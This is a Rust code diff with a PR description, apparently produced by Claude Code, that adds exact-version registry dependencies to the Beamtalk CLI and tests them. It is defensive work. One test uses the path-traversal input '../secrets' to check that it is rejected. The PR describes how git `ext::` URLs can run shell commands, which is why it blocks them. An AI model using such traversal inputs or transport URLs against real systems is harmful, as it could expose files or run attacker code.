+        let resolved = ensure_index(
+            &RegistryLocation::LocalDir(root.clone()),
+            &utf8(&project),
+            false,
+        )
+        .unwrap();
+        assert_eq!(resolved, root);
+    }
+
+    #[test]
+    fn test_ensure_index_local_dir_without_packages_errors() {
+        let dir = TempDir::new().unwrap();
+        let project = TempDir::new().unwrap();
+        let err = ensure_index(
+            &RegistryLocation::LocalDir(utf8(&dir)),
+            &utf8(&project),
+            false,
+        )
+        .unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("packages"), "{msg}");
+    }
+
+    // ── Lookup ───────────────────────────────────────────────────────
+
+    #[test]
+    fn test_read_entry_hit() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let entry = read_entry(&root, "yaml").unwrap().unwrap();
+        assert_eq!(entry.name, "yaml");
+    }
+
+    #[test]
+    fn test_read_entry_miss_returns_none() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        assert!(read_entry(&root, "nope").unwrap().is_none());
+    }
+
+    #[test]
+    fn test_read_entry_rejects_path_traversal() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        assert!(read_entry(&root, "../secrets").is_err());
+        assert!(read_entry(&root, "a/b").is_err());
+    }
+
+    #[test]
+    fn test_resolve_release_hit() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let location = RegistryLocation::LocalDir(root);
+
+        let release = resolve_release(&utf8(&project), &location, "yaml", "0.2.1").unwrap();
+        assert_eq!(release.version, "0.2.1");
+        assert_eq!(release.git, "https://example.test/yaml");
+        assert_eq!(release.tag, "release-0.2.1");
+    }
+
+    #[test]
+    fn test_resolve_release_defaults_tag_from_version() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let location = RegistryLocation::LocalDir(root);
+
+        let release = resolve_release(&utf8(&project), &location, "yaml", "0.1.0").unwrap();
+        assert_eq!(release.tag, "v0.1.0");
+    }
+
+    #[test]
+    fn test_resolve_release_unknown_package_lists_available() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let location = RegistryLocation::LocalDir(root);
+
+        let err = resolve_release(&utf8(&project), &location, "json", "1.0.0").unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("not found in the registry"), "{msg}");
+        assert!(
+            msg.contains("yaml"),
+            "should list available packages: {msg}"
+        );
+    }
+
+    #[test]
+    fn test_resolve_release_unknown_version_lists_versions() {
+        let (_dir, root) = make_index(&[("yaml", YAML_ENTRY)]);
+        let project = TempDir::new().unwrap();
+        let location = RegistryLocation::LocalDir(root);
+
+        let err = resolve_release(&utf8(&project), &location, "yaml", "9.9.9").unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("Available versions"), "{msg}");
+        assert!(msg.contains("0.2.1"), "{msg}");
+        assert!(msg.contains("0.1.0"), "{msg}");
+        assert!(
+            msg.contains("The latest version is 0.2.1"),
+            "should suggest the latest: {msg}"
+        );
+    }
+}

--- a/crates/beamtalk-cli/src/commands/deps/registry.rs
+++ b/crates/beamtalk-cli/src/commands/deps/registry.rs
@@ -344,7 +344,9 @@ fn recover_orphaned_index(index_dir: &Utf8Path) {
     let previous = index_dir.with_extension("previous");
     if previous.join("packages").is_dir() {
         debug!(%previous, %index_dir, "Restoring registry index left by an interrupted swap");
-        let _ = std::fs::rename(&previous, index_dir);
+        if let Err(e) = std::fs::rename(&previous, index_dir) {
+            debug!(%e, "Failed to restore orphaned registry index — will re-clone");
+        }
     }
 }
 

--- a/crates/beamtalk-cli/src/commands/deps/registry.rs
+++ b/crates/beamtalk-cli/src/commands/deps/registry.rs
@@ -283,6 +283,12 @@ pub fn ensure_index(
 fn ensure_git_index(url: &str, project_root: &Utf8Path, refresh: bool) -> Result<Utf8PathBuf> {
     let index_dir = BuildLayout::new(project_root).registry_index_dir();
 
+    // `swap_in_index` moves the old index aside before renaming the new one
+    // into place. If a previous run was killed between those two renames, the
+    // only good copy is sitting at `index.previous` — put it back before
+    // deciding whether an index exists at all.
+    recover_orphaned_index(&index_dir);
+
     let has_index = index_dir.join("packages").is_dir();
 
     if has_index {
@@ -323,6 +329,22 @@ fn ensure_git_index(url: &str, project_root: &Utf8Path, refresh: bool) -> Result
                 Err(e)
             }
         }
+    }
+}
+
+/// Restore an index stranded at `<index_dir>.previous` by an interrupted swap.
+///
+/// Only acts when `index_dir` itself has no usable index, so it can never
+/// clobber a good checkout.
+fn recover_orphaned_index(index_dir: &Utf8Path) {
+    if index_dir.join("packages").is_dir() {
+        return;
+    }
+
+    let previous = index_dir.with_extension("previous");
+    if previous.join("packages").is_dir() {
+        debug!(%previous, %index_dir, "Restoring registry index left by an interrupted swap");
+        let _ = std::fs::rename(&previous, index_dir);
     }
 }
 

--- a/crates/beamtalk-cli/src/dependency_classes.rs
+++ b/crates/beamtalk-cli/src/dependency_classes.rs
@@ -146,7 +146,12 @@ pub fn resolve_dependency_class_infos(project_root: &Utf8Path) -> (bool, Vec<Cla
                     };
                     normalize_path(&declaring_root.join(relative))
                 }
-                DependencySource::Git { .. } => layout.dep_checkout_dir(&name),
+                // A registry dependency is fetched into the same checkout
+                // directory as a git dependency once resolved, so the offline
+                // walk treats the two identically (BT-2978).
+                DependencySource::Git { .. } | DependencySource::Registry { .. } => {
+                    layout.dep_checkout_dir(&name)
+                }
             };
 
             if !dep_root.is_dir() {
@@ -425,6 +430,34 @@ mod tests {
         assert!(
             infos.iter().any(|c| c.name == "HTTPServer"),
             "expected HTTPServer in resolved class infos, got {infos:?}"
+        );
+    }
+
+    /// BT-2978: a registry dependency lands in the same `_build/deps/<name>/`
+    /// checkout as a git dependency, so the offline walk must find its classes
+    /// the same way.
+    #[test]
+    #[serial_test::serial(dependency_class_cache)]
+    fn registry_dependency_checkout_present_resolves_classes() {
+        let tmp = TempDir::new().unwrap();
+        let root = Utf8Path::from_path(tmp.path()).unwrap();
+        write(
+            tmp.path().join("beamtalk.toml").as_path(),
+            "[package]\nname = \"app\"\nversion = \"0.1.0\"\n\n\
+             [dependencies]\nyaml = \"0.2.1\"\n",
+        );
+        write(
+            tmp.path()
+                .join("_build/deps/yaml/src/yaml_parser.bt")
+                .as_path(),
+            "Object subclass: YAMLParser\n",
+        );
+
+        let (has_deps, infos) = resolve_dependency_class_infos(root);
+        assert!(has_deps);
+        assert!(
+            infos.iter().any(|c| c.name == "YAMLParser"),
+            "expected YAMLParser in resolved class infos, got {infos:?}"
         );
     }
 

--- a/crates/beamtalk-cli/src/manifest.rs
+++ b/crates/beamtalk-cli/src/manifest.rs
@@ -308,6 +308,15 @@ fn validate_exact_version(version: &str) -> Result<(), String> {
                 "version segment '{segment}' is not a non-negative integer"
             ));
         }
+        // `01.0.0` and `1.0.0` name the same release but would be pinned as two
+        // different strings in the lockfile, so only the canonical spelling is
+        // accepted.
+        if segment.len() > 1 && segment.starts_with('0') {
+            return Err(format!(
+                "version segment '{segment}' has a leading zero — write it as '{}'",
+                segment.trim_start_matches('0')
+            ));
+        }
     }
 
     Ok(())
@@ -1583,6 +1592,25 @@ json = { git = "https://example.test/json", tag = "v1.0.0" }
     }
 
     #[test]
+    fn test_registry_dependency_rejects_leading_zero_version() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "01.0.0""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("leading zero"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_accepts_zero_segments() {
+        // A bare `0` segment is canonical and must still be accepted.
+        let temp = TempDir::new().unwrap();
+        let manifest = parse_single_dep(&temp, r#"yaml = "0.0.0""#).unwrap();
+        assert!(matches!(
+            manifest.dependencies["yaml"].source,
+            DependencySource::Registry { .. }
+        ));
+    }
+
+    #[test]
     fn test_registry_dependency_rejects_invalid_package_name() {
         let temp = TempDir::new().unwrap();
         let err = parse_single_dep(&temp, r#"BadName = "1.2.3""#).unwrap_err();
@@ -1620,6 +1648,26 @@ url = "https://example.test/registry"
             manifest.registry.unwrap().url,
             "https://example.test/registry"
         );
+    }
+
+    /// A Windows path in `[registry] url` must be written as a TOML *literal*
+    /// string — in a basic string its backslashes are escapes, and `\U` in
+    /// particular is a unicode escape that fails to parse (the same hazard as
+    /// BT-1737's `file://` handling).
+    #[test]
+    fn test_registry_url_accepts_windows_path_as_literal_string() {
+        let temp = TempDir::new().unwrap();
+        let windows_path = r"C:\Users\RUNNER~1\AppData\Local\Temp\.tmpZ1Oqf7";
+        let path = write_manifest(
+            &temp,
+            &format!(
+                "[package]\nname = \"my_app\"\nversion = \"0.1.0\"\n\n\
+                 [registry]\nurl = '{windows_path}'\n"
+            ),
+        );
+
+        let manifest = parse_manifest_full(&path.join("beamtalk.toml")).unwrap();
+        assert_eq!(manifest.registry.unwrap().url, windows_path);
     }
 
     #[test]

--- a/crates/beamtalk-cli/src/manifest.rs
+++ b/crates/beamtalk-cli/src/manifest.rs
@@ -67,6 +67,10 @@ pub struct Manifest {
     /// The optional `[native]` section containing `dependencies` for hex packages.
     #[serde(default)]
     native: Option<NativeSection>,
+    /// The optional `[registry]` section overriding the package registry the
+    /// project's registry dependencies resolve through.
+    #[serde(default)]
+    registry: Option<RegistryConfig>,
     /// The optional `[diagnostics]` section — per-category severity overrides
     /// (ADR 0100 Rule 3). Stored as raw TOML for lazy parsing.
     ///
@@ -86,9 +90,28 @@ struct NativeSection {
     dependencies: Option<toml::Value>,
 }
 
+/// The `[registry]` section of `beamtalk.toml`.
+///
+/// Overrides which package registry this project's registry dependencies
+/// resolve through. The value may be a git URL (cloned into
+/// `_build/registry/index/`) or a path to a local directory containing a
+/// `packages/` subdirectory (used in place, with no git and no network).
+///
+/// ```toml
+/// [registry]
+/// url = "https://github.com/jamesc/beamtalk-registry"
+/// ```
+#[derive(Debug, Deserialize, Clone, PartialEq, Eq)]
+#[serde(deny_unknown_fields)]
+pub struct RegistryConfig {
+    /// The registry index location — a git URL or a local directory path.
+    pub url: String,
+}
+
 /// A dependency entry as it appears in `beamtalk.toml`.
 ///
-/// Supports two forms:
+/// Supports three forms:
+/// - `name = "1.2.3"` — registry dependency at an exact version
 /// - `name = { path = "..." }` — local path dependency
 /// - `name = { git = "...", tag/branch/rev = "..." }` — git dependency
 #[derive(Debug, Deserialize, Clone)]
@@ -214,6 +237,82 @@ fn validate_dependency(name: &str, dep: &TomlDependency) -> Result<DependencySpe
     })
 }
 
+/// Validate a bare-string registry dependency (`name = "1.2.3"`).
+///
+/// Registry dependencies pin an exact `major.minor.patch` version — version
+/// ranges are deliberately not supported, so the resolved graph is always
+/// reproducible without a constraint solver.
+fn validate_registry_dependency(name: &str, version: &str) -> Result<DependencySpec> {
+    if let Err(e) = validate_package_name(name) {
+        miette::bail!(
+            "Invalid dependency name '{name}': {}",
+            format_name_error(name, &e)
+        );
+    }
+
+    if let Err(reason) = validate_exact_version(version) {
+        miette::bail!(
+            "Dependency '{name}' has an invalid version '{version}' — {reason}\n\n  \
+             Registry dependencies must pin an exact version, e.g.\n    \
+             {name} = \"1.2.3\"\n\n  \
+             For version ranges or a specific branch, use a git dependency instead:\n    \
+             {name} = {{ git = \"https://...\", tag = \"v1.2.3\" }}"
+        );
+    }
+
+    Ok(DependencySpec {
+        name: name.to_string(),
+        source: DependencySource::Registry {
+            version: version.to_string(),
+        },
+    })
+}
+
+/// Validate an exact `major.minor.patch` version string.
+///
+/// Every segment must be a non-empty run of ASCII digits. Returns a short
+/// human-readable reason on failure (the caller adds the surrounding context).
+fn validate_exact_version(version: &str) -> Result<(), String> {
+    if version.is_empty() {
+        return Err("the version is empty".to_string());
+    }
+
+    if version.trim() != version {
+        return Err("the version has leading or trailing whitespace".to_string());
+    }
+
+    // Reject range/constraint operators with a targeted message rather than
+    // the generic "not major.minor.patch" one.
+    for op in ["~>", ">=", "<=", ">", "<", "=", "^", "*"] {
+        if version.starts_with(op) {
+            return Err(format!(
+                "version ranges are not supported (found '{op}'), only exact versions"
+            ));
+        }
+    }
+
+    let segments: Vec<&str> = version.split('.').collect();
+    if segments.len() != 3 {
+        return Err(format!(
+            "expected exactly three segments (major.minor.patch), found {}",
+            segments.len()
+        ));
+    }
+
+    for segment in &segments {
+        if segment.is_empty() {
+            return Err("a version segment is empty".to_string());
+        }
+        if !segment.bytes().all(|b| b.is_ascii_digit()) {
+            return Err(format!(
+                "version segment '{segment}' is not a non-negative integer"
+            ));
+        }
+    }
+
+    Ok(())
+}
+
 /// Parse and validate the `[dependencies]` section of a manifest.
 ///
 /// Returns an empty map if the section is missing or empty.
@@ -236,14 +335,25 @@ fn parse_dependencies(deps: Option<&toml::Value>) -> Result<DependencyMap> {
 
     let mut result = DependencyMap::new();
     for (name, value) in table {
-        // Each dependency entry must be an inline table like { path = "..." }
-        let dep: TomlDependency = value
-            .clone()
-            .try_into()
-            .into_diagnostic()
-            .wrap_err_with(|| format!("Dependency '{name}' has an invalid format — expected a table with 'path' or 'git' keys"))?;
+        // A bare string is a registry dependency: `name = "1.2.3"`.
+        let spec = if let Some(version) = value.as_str() {
+            validate_registry_dependency(name, version)?
+        } else {
+            // Otherwise the entry must be an inline table like { path = "..." }
+            let dep: TomlDependency =
+                value
+                    .clone()
+                    .try_into()
+                    .into_diagnostic()
+                    .wrap_err_with(|| {
+                        format!(
+                            "Dependency '{name}' has an invalid format — expected a version string \
+                         like \"1.2.3\", or a table with 'path' or 'git' keys"
+                        )
+                    })?;
 
-        let spec = validate_dependency(name, &dep)?;
+            validate_dependency(name, &dep)?
+        };
         result.insert(name.clone(), spec);
     }
     Ok(result)
@@ -503,6 +613,9 @@ pub struct ParsedManifest {
     /// The parsed and validated `[diagnostics]` severity overrides (ADR 0100
     /// Rule 3; empty if the section is absent).
     pub diagnostics: DiagnosticsTable,
+    /// The optional `[registry]` section — overrides where registry
+    /// dependencies are resolved from (`None` uses the env var / default).
+    pub registry: Option<RegistryConfig>,
 }
 
 /// Parse a `beamtalk.toml` manifest file.
@@ -557,6 +670,7 @@ pub fn parse_manifest_full(path: &Utf8Path) -> Result<ParsedManifest> {
         dependencies,
         native_dependencies,
         diagnostics,
+        registry: manifest.registry,
     })
 }
 
@@ -1341,6 +1455,198 @@ utils = { path = "../my-utils" }
                 path: PathBuf::from("../my-utils")
             }
         );
+    }
+
+    // --- Registry dependency parsing (BT-2978) ---
+
+    /// Render an error as a single line.
+    ///
+    /// miette's `Debug` output hard-wraps to the terminal width, so asserting
+    /// on a multi-word phrase is otherwise flaky — collapsing whitespace lets
+    /// tests assert on the message as written.
+    fn flat_err(err: &miette::Report) -> String {
+        format!("{err:?}")
+            .split_whitespace()
+            .collect::<Vec<_>>()
+            .join(" ")
+    }
+
+    /// Parse a `[dependencies]` table containing a single entry, returning the
+    /// result so tests can assert on either success or the error message.
+    fn parse_single_dep(temp: &TempDir, entry: &str) -> Result<ParsedManifest> {
+        let path = write_manifest(
+            temp,
+            &format!(
+                "[package]\nname = \"my_app\"\nversion = \"0.1.0\"\n\n[dependencies]\n{entry}\n"
+            ),
+        );
+        parse_manifest_full(&path.join("beamtalk.toml"))
+    }
+
+    #[test]
+    fn test_parse_registry_dependency() {
+        let temp = TempDir::new().unwrap();
+        let manifest = parse_single_dep(&temp, r#"yaml = "0.2.1""#).unwrap();
+
+        assert_eq!(manifest.dependencies.len(), 1);
+        let dep = &manifest.dependencies["yaml"];
+        assert_eq!(dep.name, "yaml");
+        assert_eq!(
+            dep.source,
+            DependencySource::Registry {
+                version: "0.2.1".to_string()
+            }
+        );
+    }
+
+    #[test]
+    fn test_registry_dependency_display() {
+        let temp = TempDir::new().unwrap();
+        let manifest = parse_single_dep(&temp, r#"yaml = "0.2.1""#).unwrap();
+        assert_eq!(
+            manifest.dependencies["yaml"].to_string(),
+            "yaml (registry: 0.2.1)"
+        );
+    }
+
+    #[test]
+    fn test_registry_and_other_sources_coexist() {
+        let temp = TempDir::new().unwrap();
+        let path = write_manifest(
+            &temp,
+            r#"
+[package]
+name = "my_app"
+version = "0.1.0"
+
+[dependencies]
+yaml = "0.2.1"
+utils = { path = "../my-utils" }
+json = { git = "https://example.test/json", tag = "v1.0.0" }
+"#,
+        );
+
+        let manifest = parse_manifest_full(&path.join("beamtalk.toml")).unwrap();
+        assert_eq!(manifest.dependencies.len(), 3);
+        assert!(matches!(
+            manifest.dependencies["yaml"].source,
+            DependencySource::Registry { .. }
+        ));
+        assert!(matches!(
+            manifest.dependencies["utils"].source,
+            DependencySource::Path { .. }
+        ));
+        assert!(matches!(
+            manifest.dependencies["json"].source,
+            DependencySource::Git { .. }
+        ));
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_partial_version() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "0.2""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("expected exactly three segments"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_range() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "~> 1.0""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("version ranges are not supported"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_empty_version() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = """#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("empty"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_non_numeric_version() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "1.2.beta""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("not a non-negative integer"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_too_many_segments() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "1.2.3.4""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("expected exactly three segments"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_rejects_invalid_package_name() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"BadName = "1.2.3""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("Invalid dependency name"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dependency_error_suggests_git_alternative() {
+        let temp = TempDir::new().unwrap();
+        let err = parse_single_dep(&temp, r#"yaml = "~> 1.0""#).unwrap_err();
+        let msg = flat_err(&err);
+        assert!(msg.contains("git ="), "should suggest a git dep: {msg}");
+    }
+
+    // --- [registry] section ---
+
+    #[test]
+    fn test_parse_registry_section() {
+        let temp = TempDir::new().unwrap();
+        let path = write_manifest(
+            &temp,
+            r#"
+[package]
+name = "my_app"
+version = "0.1.0"
+
+[registry]
+url = "https://example.test/registry"
+"#,
+        );
+
+        let manifest = parse_manifest_full(&path.join("beamtalk.toml")).unwrap();
+        assert_eq!(
+            manifest.registry.unwrap().url,
+            "https://example.test/registry"
+        );
+    }
+
+    #[test]
+    fn test_registry_section_absent_is_none() {
+        let temp = TempDir::new().unwrap();
+        let path = write_manifest(&temp, "[package]\nname = \"my_app\"\nversion = \"0.1.0\"\n");
+        let manifest = parse_manifest_full(&path.join("beamtalk.toml")).unwrap();
+        assert!(manifest.registry.is_none());
+    }
+
+    #[test]
+    fn test_registry_section_rejects_unknown_fields() {
+        let temp = TempDir::new().unwrap();
+        let path = write_manifest(
+            &temp,
+            r#"
+[package]
+name = "my_app"
+version = "0.1.0"
+
+[registry]
+url = "https://example.test/registry"
+mirror = "https://example.test/other"
+"#,
+        );
+
+        assert!(parse_manifest_full(&path.join("beamtalk.toml")).is_err());
     }
 
     #[test]

--- a/crates/beamtalk-core/src/compilation/dependency.rs
+++ b/crates/beamtalk-core/src/compilation/dependency.rs
@@ -6,9 +6,11 @@
 //! **DDD Context:** Compilation
 //!
 //! These types represent parsed dependency declarations from `beamtalk.toml`.
-//! Phase 1 supports two dependency sources:
+//! Three dependency sources are supported:
 //! - **Path dependencies:** local filesystem paths (for monorepo/development)
 //! - **Git dependencies:** remote git repositories with tag, branch, or rev pinning
+//! - **Registry dependencies:** an exact version resolved through the package
+//!   registry index into a `(git url, tag)` pair
 
 use std::collections::BTreeMap;
 use std::fmt;
@@ -47,6 +49,20 @@ pub enum DependencySource {
         /// The git reference to check out.
         reference: GitReference,
     },
+
+    /// A registry dependency, declared as a bare exact version string.
+    ///
+    /// ```toml
+    /// yaml = "0.2.1"
+    /// ```
+    ///
+    /// The version is looked up in the registry index (`packages/<name>.toml`)
+    /// to produce a `(git url, tag)` pair, which then flows through the same
+    /// machinery as a [`DependencySource::Git`] dependency.
+    Registry {
+        /// The exact requested version (`major.minor.patch`).
+        version: String,
+    },
 }
 
 /// A git reference for pinning a dependency to a specific point in history.
@@ -72,6 +88,7 @@ impl fmt::Display for DependencySource {
                     GitReference::Rev(rev) => write!(f, " (rev: {rev})"),
                 }
             }
+            Self::Registry { version } => write!(f, "registry: {version}"),
         }
     }
 }


### PR DESCRIPTION
[BT-2978](https://linear.app/beamtalk/issue/BT-2978) — the consumer side of the library registry (epic [BT-2977](https://linear.app/beamtalk/issue/BT-2977)).

A bare version string in `[dependencies]` resolves through a registry index into a `(git url, tag)` pair, which then flows through the existing git-dependency machinery — `resolve_git_dep`, `beamtalk.lock`, staleness detection — unchanged.

```toml
[dependencies]
yaml = "0.2.1"

[registry]                                     # optional
url = "https://github.com/jamesc/beamtalk-registry"
```

The index is a directory (typically a git repo) with one file per package:

```toml
# packages/yaml.toml
name = "yaml"
description = "YAML parsing for Beamtalk"

[[versions]]
version = "0.2.1"
git = "https://github.com/jamesc/beamtalk-yaml"
tag = "v0.2.1"   # optional — defaults to "v{version}"
```

## What's here

- `DependencySource::Registry { version }` in beamtalk-core, with a `Display` arm
- Bare-string dependency parsing, enforcing an exact `major.minor.patch`. `"0.2"`, `"~> 1.0"`, `""` and non-numeric versions are all rejected with errors that name the problem and point at the git-dependency alternative.
- Optional `[registry] url` (`deny_unknown_fields`), exposed on `ParsedManifest`. Location priority is `BEAMTALK_REGISTRY` → manifest → default. A local directory is read in place — no git, no network, which is how the tests work.
- New `commands/deps/registry.rs`: location resolution, index clone/refresh into `_build/registry/index/`, entry parsing, release lookup, and numeric version ordering (`0.10.0` > `0.9.1`, no semver crate).
- `LockEntry` gains `registry_version`, serialized as an optional `version` field. Pre-registry lockfiles still parse.
- `graph.rs` resolves registry deps with a lockfile fast path that skips the index entirely, then validates the checked-out package's own declared version against the request.
- `deps_are_fresh` counts registry deps toward the lockfile requirement and goes stale on a manifest-vs-locked version mismatch; `dependency_classes.rs`'s offline walk treats registry deps like git deps (per the BT-2836 keep-in-sync note).

Errors list what *is* available: an unknown package names the packages in the index, an unknown version lists the published versions and suggests the latest.

## Review fixes (second commit)

**Security.** A registry dependency's git URL comes from the index — third-party data, not the user's own `beamtalk.toml`. `validate_git_url` now rejects `ext::`/`fd::` transport-helper URLs (git dispatches those to a remote helper; `ext::` runs an arbitrary shell command, so such a URL is code execution rather than a fetch) and URLs beginning with `-` (git would read them as options). Clones pass the URL after `--` and run with `protocol.ext.allow=never`. Applied to both dependency and index clones.

**Two stale-lock bugs.** `resolve_git_dep` only skips the re-clone when the lock entry describes the request actually being made; it previously compared just the recorded SHA against the checkout HEAD, so bumping a tag in `beamtalk.toml` silently kept building the previously locked commit. And `resolve_registry_dep` drops a non-matching lock entry rather than forwarding it, so a registry version bump refetches instead of failing with a misleading "version mismatch" against a stale checkout. Both have regression tests; both were verified to fail without the fix.

**Robustness.** A failed index refresh keeps the working index instead of deleting it up front and then failing to replace it. Index entries accept unknown fields — the index is versioned separately from this binary, so a future `checksum`/`yanked` key must not break already-released clients. Duplicate versions in an entry are rejected rather than silently resolving to whichever block came first. A relative `[registry] url` resolves against the project root rather than the process cwd, so the CLI, LSP and MCP servers agree on what a manifest names.

## Testing

All new tests are network-free, using local `file://` repos per the existing `deps/git.rs` pattern: manifest parsing and version rejection, index lookup hit/miss, version ordering, e2e graph resolve, lockfile round-trip, lock-hit-with-the-index-deleted, version-mismatch, version-bump refetch, transitive registry deps resolving through the root registry, git-backed index (clone, refresh-picks-up-a-new-version, failed-refresh-keeps-index), and URL validation.

`just ci-changed` passes.

## Follow-ups filed

Review surfaced five things deliberately left out of scope, all filed under BT-2977:

- **[BT-2992](https://linear.app/beamtalk/issue/BT-2992)** (urgent) — the locked SHA is never enforced on a fresh clone, so a moved tag silently rebuilds and rewrites the lockfile on CI. Deferred because the fix changes resolution behaviour for all existing git deps, including branch deps, and needs its own decision and CHANGELOG entry.
- **[BT-2993](https://linear.app/beamtalk/issue/BT-2993)** — lock entries don't record which registry produced them, so switching to a mirror is silently a no-op for already-locked deps.
- **[BT-2994](https://linear.app/beamtalk/issue/BT-2994)** — freshness detection only inspects the root manifest, so a version bump in a *transitive* registry or git dep goes unnoticed.
- **[BT-2995](https://linear.app/beamtalk/issue/BT-2995)** — ADR 0073 (marked Implemented) specifies `[repos]`, a hex-compatible registry, PubGrub ranges and a distinct lockfile entry kind. This PR ships a simpler exact-version git-index design; the ADR needs amending or superseding to match.
- **[BT-2996](https://linear.app/beamtalk/issue/BT-2996)** — the index is cloned per project and has no locking around concurrent access.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01QGMonGJyXj5Gtz24cp2Tec

---
_Generated by [Claude Code](https://claude.ai/code/session_01QGMonGJyXj5Gtz24cp2Tec)_